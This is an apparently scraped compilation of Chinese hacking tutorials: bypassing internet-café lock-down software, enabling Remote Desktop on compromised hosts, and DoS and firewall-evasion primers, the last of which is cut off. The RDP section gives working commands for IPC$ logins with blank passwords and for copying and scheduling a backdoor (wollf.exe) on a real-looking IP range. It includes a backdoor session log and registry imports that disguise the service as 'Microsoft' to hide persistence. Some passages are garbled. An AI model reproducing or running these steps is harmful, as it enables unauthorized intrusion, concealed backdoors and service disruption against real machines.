  conn.open“shujiyuan”

  (3)使用Access来为数据库文件编码及加密。首先在“工具→安全→加密/解密数据库”中选取数据库(如:employer.mdb),然后按确定,接着会出现“数据库加密后另存为”的窗口,可存为:“employer1.mdb”。

  要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看数据库文件的内容。

  接下来我们为数据库加密,首先打开经过编码了的 employer1.mdb,在打开时,选择“独占”方式。然后选取功能表的“工具→安全→设置数据库密码”,接着输入密码即可。这样即使他人得到了employer1.mdb文件,没有密码他也是无法看到 employer1.mdb中的内容





37秒迅速破解网吧


在的不光是美萍了,还有就是幻境
:-)我说一下破它的办法:

媒体对美萍的漏洞说了许多,但我们这儿的网吧用的是万象幻境,一时好奇想看看它有没有漏洞,就试了试,没想到让我发现了许多,今天为你介绍最简单的几种方法--两分钟即可破解万象幻境的方法。


先来说说网管类软件的原理。其实,网管类软件不过是个外壳程序而已,它先于其他一切程序加载,提供一个受密码保护的界面,一般用户只能通过这个界面调用一些被允许的程序。为加强管理,网管类软件都有密码保护,封锁热键等功能,如今更是做到了客户机/服务器模式、数据库管理。也因此招徕了许多网友的不满,一时,反抗之声不绝于耳。


破解的关键在于如何能访问硬盘,因为你要执行的文件或寻找万象幻境的密码都离不开硬盘。那么如何进入硬盘呢?往下看,共为你准备了10种方法:


1.利用输入法漏洞


输入法漏洞不是中文Win2000的漏洞吗?没错!不过万象幻境也有这个漏洞!方法很简单:按ctrl+shift打开[M$]拼音输入法(如没有用其它输入法也可,方法类似),然后将光标插入会员卡号的文本输入框内,接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组(放心,就算系统限制右键,在这也不管用)然后选择文件菜单里面的保存,就会调出保存对话框,然后随便选择一个文件夹,点击右键,选择资源管理器,打开,一切就OK啦!如果鼠标被限定在那个锁定窗口内,就用键盘操作。


2.利用QQ


网吧别的软件可以没有,但QQ绝对会有,否则就不会有那么多人去网吧了。打开QQ,随便选择一个好友,点传送文件, 就会出现一个小窗口,让你选择文件,呵呵 ,秘密就在这里,先找到C盘下的注册表编辑器Regedit.exe,先用鼠标选中该文件,松开鼠标,用鼠标右键点击该文件,这时千万不要松开右键,点鼠标左键,就会出来右键菜单,里面什么都有,删除,打开,复制,呵呵,和不在美萍的限制下一样的,这下你想干什么就可以干什么了。


3.利用Foxmail或Outlook Express


以Foxmail为例来讲讲,Outlook Express类同。点“邮件”->“写新邮件”,在出现的“写邮件”窗口中点击“邮件”菜单下的“增加附件”,就会调出“打开”对话框,可以看到驱动器列表和目录列表了,想怎么样自己看着办吧!


4.利用TE


TE是QQ附带的浏览器,启动它,在地址栏直接输入C:回车,看看出现什么了?哈哈,C盘尽在眼前。但到了C盘有什么用呢,如果网管做了手脚,你还是不能执行文件。但是当我们用鼠标右键点上你要执行的文件(注意,是鼠标的右键),此时没有任何反映。此时不要松开鼠标右键,再按下鼠标左键,哈哈,看到鼠标正常的右键菜单了吧。这时点击"打开"选项,文件就被打开了。


5.用看图软件Acdsee


如果网吧中有这个软件,利用它的浏览功能,可以轻松的找到任何一个文件!呵呵,它的浏览功能帮过我不少忙,其实只要是有驱动器列表和目录列表控件的软件几乎都可以被利用,因为那是Windows的标准控件,一般是很难屏蔽的。


6.升级网吧管理专家


你可以“好心”的帮网吧管理者把网吧管理专家升级一下,那就什么密码也没有了,想干什么都可以了。不过,被发现了暴扁一顿可别来找我。


7.利用IE


先打开IE,再打开“收藏”菜单,用鼠标将“链接”拖入IE地址栏下面的空白区,然后点击“向上”、“向上”、再“向上”,看到了什么?对了,是C盘根目录!此时已经可以按方法5中所说方法为所欲为了。


8.Win98登入过程


在进入Win98登入过程中,网吧管理专家把鼠标锁定在右边的时候,左键单击屏幕,然后按F1键(多按几次)在彻底出现登入窗口的时候,如果成功的话会出现“Windows帮助”窗口,在“选项”下拉菜单中选择“按Web 帮助”,在“Web 帮助”窗口中点击“联机支持”的链接,这时弹出一个Internet Explorer浏览器了。只要在地址栏中输入要访问的站点(如在地址栏里输入http://www.sina.com.cn)或盘符(如c盘 c:\ ),如果网吧管理专家对硬盘进行保护使我们没法访问某个盘符时,可以用按“F3”键(windows默认的查找热键)弹出一个查找窗口后,输入你想打开的文件或文件夹进行查找,找到后即可打开。


9.桌面快捷方式


对桌面上的快捷方式点击右键,在弹出的菜单中选择“属性”->“更改图标”->“浏览”,可以打开文件浏览窗口,看是不是C盘出来了,然后点击向上到C盘windows文件夹找到系统工具的系统配置实用程序将自启动程序去掉,重启机器这样就可以啦!


10.Ctrl+Alt+Del


上面说的方法太麻烦了,这个简单。在看到窗口的画面时就按Ctrl+Alt+Del,大家会看到一个client项。结束它,但这时候还不行。过一会儿还会启动一次,再按Ctrl+Alt+Del结束它(这个步骤很不好使,要试好多次才能掌握),太快不行,太慢也不行,试多了就行了,最后你就会百试百灵 。有的网吧管理专家下了补丁,会运行多一次,你再多结束一次任务就行了。

没骨头,怎么办?来这里动动手,赚骨头啦!!!









开启3389的5种方法(上)


一:使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
 

 

==========================================================================================
第二种方法:
==========================================================================================
进入后:TELNET上去!

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK


或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!
 

 

==========================================================================================

第三种方法:
==========================================================================================
进入后,先检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
 

 

==========================================================================================
第四种方法:
==========================================================================================

C:\documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内

容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......






开启3389的5种方法(下)


------------------------------------------------------------------------------------------
C:\documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org/
------------------------------------------------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。

------------------------------------------------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
&copy; 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。


------------------------------------------------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节

D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。


==========================================================================================
D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot


Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装

终端服务。

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
 

==========================================================================================
第五种方法:
==========================================================================================

 
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起动"肉机"。

3.使用本地的3398客户端,连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端,连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?

















DOS攻击原理及方法介绍


已经有很多介绍DOS(Denial of Service,即拒绝服务)攻击的文章,但是,多数人还是不知道DOS到底是什么,它到底是怎么实现的。本文主要介绍DOS的机理和常见的实施方法。因前段时间仔细了解了TCP/IP协议以及RFC文档,有点心得。同时,文中有部分内容参考了Shaft的文章翻译而得
。要想了解DOS攻击得实现机理,必须对TCP有一定的了解。所以,本文分为两部分,第一部分介绍一
些实现DOS攻击相关的协议,第二部分则介绍DOS的常见方式。

1、 什么是DOS攻击
DOS:即Denial Of Service,拒绝服务的缩写,可不能认为是微软的dos操作系统了。好象在5·1的时候闹过这样的笑话。拒绝服务,就相当于必胜客在客满的时候不再让人进去一样,呵呵,你想吃馅饼,就必须在门口等吧。DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问,这些资源包括磁盘空间、内存、进程甚至网络带宽,从而阻止正常用户的访问。比如:
* 试图FLOOD服务器,阻止合法的网络通?br>* 破坏两个机器间的连接,阻止访问服务
* 阻止特殊用户访问服务
* 破坏服务器的服务或者导致服务器死机
不过,只有那些比较阴险的攻击者才单独使用DOS攻击,破坏服务器。通常,DOS攻击会被作为一次入侵的一部分,比如,绕过入侵检测系统的时候,通常从用大量的攻击出发,导致入侵检测系统日志过多或者反应迟钝,这样,入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

2、有关TCP协议的东西
TCP(transmission control protocol,传输控制协议),是用来在不可靠的因特网上提供可靠的、端到端的字节流通讯协议,在RFC793中有正式定义,还有一些解决错误的东西在RFC 1122中有记录,RFC 1323则有TCP的功能扩展。

我们常见到的TCP/IP协议中,IP层不保证将数据报正确传送到目的地,TCP则从本地机器接受用户的数据流,将其分成不超过64K字节的数据片段,将每个数据片段作为单独的IP数据包发送出去,最后在目的地机器中再组合成完整的字节流,TCP协议必须保证可靠性。

发送和接收方的TCP传输以数据段的形式交换数据,一个数据段包括一个固定的20字节头,加上可选部分,后面再跟上数据,TCP协议从发送方传送一个数据段的时候,还要启动计时器,当数据段到达目的地后,接收方还要发送回一个数据段,其中有一个确认序号,它等于希望收到的下一个数据段的顺序号,如果计时器在确认信息到达前超时了,发送方会重新发送这个数据段。

上面,我们总体上了解一点TCP协议,重要的是要熟悉TCP的数据头(header)。因为数据流的传输最重要的就是header里面的东西,至于发送的数据,只是header附带上的。客户端和服务端的服务响应就是同header里面的数据相关,两端的信息交流和交换是根据header中的内容实施的,因此,要实现DOS,就必须对header中的内容非常熟悉。

下面是TCP数据段头格式。
Source Port和 Destination Port :是本地端口和目标端口
Sequence Number 和 Acknowledgment Number :是顺序号和确认号,确认号是希望接收的字节号。这都是32位的,在TCP流中,每个数据字节都被编号。Data offset :表明TCP头包含多少个32位字,用来确定头的长度,因为头中可选字段长度是不定的。Reserved : 保留的我不是人,现在没用,都是0
接下来是6个1位的标志,这是两个计算机数据交流的信息标志。接收和发送断根据这些标志来确定信息流的种类。下面是一些介绍: URG:(Urgent Pointer field significant)紧急指针。用到的时候值为1,用来处理避免TCP数据流中断ACK:(Acknowledgment field significant)置1时表示确认号(Acknowledgment Number)为合法,为0的时候表示数据段不包含确认信息,确认号被忽略。
PSH:(Push Function),PUSH标志的数据,置1时请求的数据段在接收方得到后就可直接送到应用程序,而不必等到缓冲区满时才传送。
RST:(Reset the connection)用于复位因某种原因引起出现的错误连接,也用来拒绝非法数据和请求。如果
接收到RST位时候,通常发生了某些错误。
SYN:(Synchronize sequence numbers)用来建立连接,在连接请求中,SYN=1,CK=0,连接响应时,SYN=1,
ACK=1。即,SYN和ACK来区分Connection Request和Connection Accepted。
FIN:(No more data from sender)用来释放连接,表明发送方已经没有数据发送。

知道这重要的6个指示标志后,我们继续来。
1我不是人的WINDOW字段:表示确认了字节后还可以发送多少字节。可以为0,表示已经收到包括确认号减1(即已发送所有数据)
在内的所有数据段。
接下来是1我不是人的Checksum字段,用来确保可靠性的。
1我不是人的Urgent Pointer,和下面的字段我们这里不解释了。不然太多了。呵呵,偷懒啊。

我们进入比较重要的一部分:TCP连接握手过程。这个过程简单地分为三步。在没有连接中,接受方(我们针对服务器),服务器处于LISTEN状态,等待其他机器发送连接请求。
第一步:客户端发送一个带SYN位的请求,向服务器表示需要连接,比如发送包假设请求序号为10,那么则为:SYN=10,ACK=0,然后等待服务器的响应。
第二步:服务器接收到这样的请求后,查看是否在LISTEN的是指定的端口,不然,就发送RST=1应答,拒绝建立连接。如果接收连接,那么服务器发送确认,SYN为服务器的一个内码,假设为100,ACK位则是客户端的请求序号加1,本例中发送的数据是:SYN=100,ACK=11,用这样的数据发送给客户端。向客户端表示,服务器连接已经准备好了,等待客户端的确认这时客户端接收到消息后,分析得到的信息,准备发送确认连接信号到服务器
第三步:客户端发送确认建立连接的消息给服务器。确认信息的SYN位是服务器发送的ACK位,ACK位是服务器发送的SYN位加1。即:SYN=11,ACK=101。
这时,连接已经建立起来了。然后发送数据,<SYN=11,ACK=101><DATA>。这是一个基本的请求和连接过程。需要注意的是这些标志位的关系,比如SYN、ACK。

3、服务器的缓冲区队列(Backlog Queue)
服务器不会在每次接收到SYN请求就立刻同客户端建立连接,而是为连接请求分配内存空间,建立会话,并放到一个等待队列中。如果,这个等待的队列已经满了,那么,服务器就不在为新的连接分配任何东西,直接丢弃新的请求。如果到了这样的地步,服务器就是拒绝服务了。
如果服务器接收到一个RST位信息,那么就认为这是一个有错误的数据段,会根据客户端IP,把这样的连接在缓冲区队列中清除掉。这对IP欺骗有影响,也能被利用来做DOS攻击。

####################################################################

上面的介绍,我们了解TCP协议,以及连接过程。要对SERVER实施拒绝服务攻击,实质上的方式就是有两个:
一, 迫使服务器的缓冲区满,不接收新的请求。
二, 使用IP欺骗,迫使服务器把合法用户的连接复位,影响合法用户的连接
这就是DOS攻击实施的基本思想。具体实现有这样的方法:

1、SYN FLOOD
利用服务器的连接缓冲区(Backlog Queue),利用特殊的程序,设置TCP的Header,向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲区队列中。
如果你的SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求了。其他合法用户的连接都被拒绝掉。可以持续你的SYN请求发送,直到缓冲区中都是你的只有SYN标记的请求。现在有很多实施SYN FLOOD的工具,呵呵,自己找去吧。

2、IP欺骗DOS攻击
这种攻击利用RST位来实现。假设现在有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接,攻击者构造攻击的TCP数据,伪装自己的IP为1.1.1.1,并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后,认为从1.1.1.1发送的连接有错误,就会清空缓冲区中建立好的连接。这时,如果合法用户1.1.1.1再发送合法数据,服务器就已经没有这样的连接了,该用户就必
须从新开始建立连接。攻击时,伪造大量的IP地址,向目标发送RST数据,使服务器不对合法用户服务。

3、 带宽DOS攻击
如果你的连接带宽足够大而服务器又不是很大,你可以发送请求,来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大了,配合上SYN一起实施DOS,威力巨大。不过是初级DOS攻击。呵呵。Ping白宫??你发疯了啊!


4、自身消耗的DOS攻击
这是一种老式的攻击手法。说老式,是因为老式的系统有这样的自身BUG。比如Win95 (winsock v1), Cisco IOS v.10.x, 和其他过时的系统。
这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同,发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快把资源消耗光。直接导致当机。这中伪装对一些身份认证系统还是威胁巨大的。
上面这些实施DOS攻击的手段最主要的就是构造需要的TCP数据,充分利用TCP协议。这些攻击方法都是建立在TCP基础上的。还
有其他的DOS攻击手段。

5、塞满服务器的硬盘
通常,如果服务器可以没有限制地执行写操作,那么都能成为塞满硬盘造成DOS攻击的途径,比如:
发送LJ邮件。一般公司的服务器可能把邮件服务器和WEB服务器都放在一起。破坏者可以发送大量的LJ邮件,这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中,直到邮箱被撑破或者把硬盘塞满。
让日志记录满。入侵者可以构造大量的错误信息发送出来,服务器记录这些错误,可能就造成日志文件非常庞大,甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志,甚至就不能发现入侵者真正的入侵途径。
向匿名FTP塞LJ文件。这样也可以塞满硬盘空间。

6、合理利用策略
一般服务器都有关于帐户锁定的安全策略,比如,某个帐户连续3次登陆失败,那么这个帐号将被锁定。这点也可以被破坏者利用,他们伪装一个帐号去错误登陆,这样使得这个帐号被锁定,而正常的合法用户就不能使用这个帐号去登陆系统了








如何突破各种防火墙


现在随着人们的安全意识加强,防火墙一般都被公司企业采用来保障网络的安全,一般的攻击者在有防火墙的情况下,一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。

  一 防火墙基本原理

  首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。

│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │

  防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两个网卡间的网络通讯能直接通过。当有防火墙时,他好比插在网卡之间,对所有的网络通讯进行控制。

  说到访问控制,这是防火墙的核心了:),防火墙主要通过一个访问控制表来判断的,他的形式一般是一连串的如下规则:

  1 accept from+ 源地址,端口 to+ 目的地址,端口+ 采取的动作

  2 deny ...........(deny就是拒绝。。)

  3 nat ............(nat是地址转换。后面说)

  防火墙在网络层(包括以下的炼路层)接受到网络数据包后,就从上面的规则连表一条一条地匹配,如果符合就执行预先安排的动作了!如丢弃包。。。。

  但是,不同的防火墙,在判断攻击行为时,有实现上的差别。下面结合实现原理说说可能的攻击。


  二 攻击包过滤防火墙

  包过滤防火墙是最简单的一种了,它在网络层截获网络数据包,根据防火墙的规则表,来检测攻击行为。他根据数据包的源IP地址;目的IP地址;TCP/UDP源端口;TCP/UDP目的端口来过滤!!很容易受到如下攻击:

  1 ip 欺骗攻击:

  这种攻击,主要是修改数据包的源,目的地址和端口,模仿一些合法的数据包来骗过防火墙的检测。如:外部攻击者,将他的数据报源地址改为内部网络地址,防火墙看到是合法地址就放行了:)。可是,如果防火墙能结合接口,地址来匹配,这种攻击就不能成功了:(

  2 d.o.s拒绝服务攻击

  简单的包过滤防火墙不能跟踪 tcp的状态,很容易受到拒绝服务攻击,一旦防火墙受到d.o.s攻击,他可能会忙于处理,而忘记了他自己的过滤功能。:)你就可以饶过了,不过这样攻击还很少的。!

  3 分片攻击

